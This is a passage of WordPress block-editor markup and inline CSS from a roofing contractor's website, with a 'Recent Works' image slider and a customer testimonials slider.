padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2ac6f6b9-bced-48f5-9f60-eae03e300214\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"47168312-0ca1-4133-bab7-40d5c2e35f72\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-47168312-0ca1-4133-bab7-40d5c2e35f72 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\"} -->\n<style type=\"text/css\"> .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa3ba4ed-9cc5-4bd3-b097-b80ffb36f938\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"f3bc0552-a5a5-4575-aa4d-c19791bc625e\"} -->\n<style type=\"text/css\"> .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-f3bc0552-a5a5-4575-aa4d-c19791bc625e is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4ef232e7-4452-4f40-9949-fe0d82ccff32\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-4ef232e7-4452-4f40-9949-fe0d82ccff32 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4ef232e7-4452-4f40-9949-fe0d82ccff32 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4ef232e7-4452-4f40-9949-fe0d82ccff32.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7fb2dcec-224f-4765-8762-daef2cd5aa1c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7fb2dcec-224f-4765-8762-daef2cd5aa1c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7fb2dcec-224f-4765-8762-daef2cd5aa1c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If 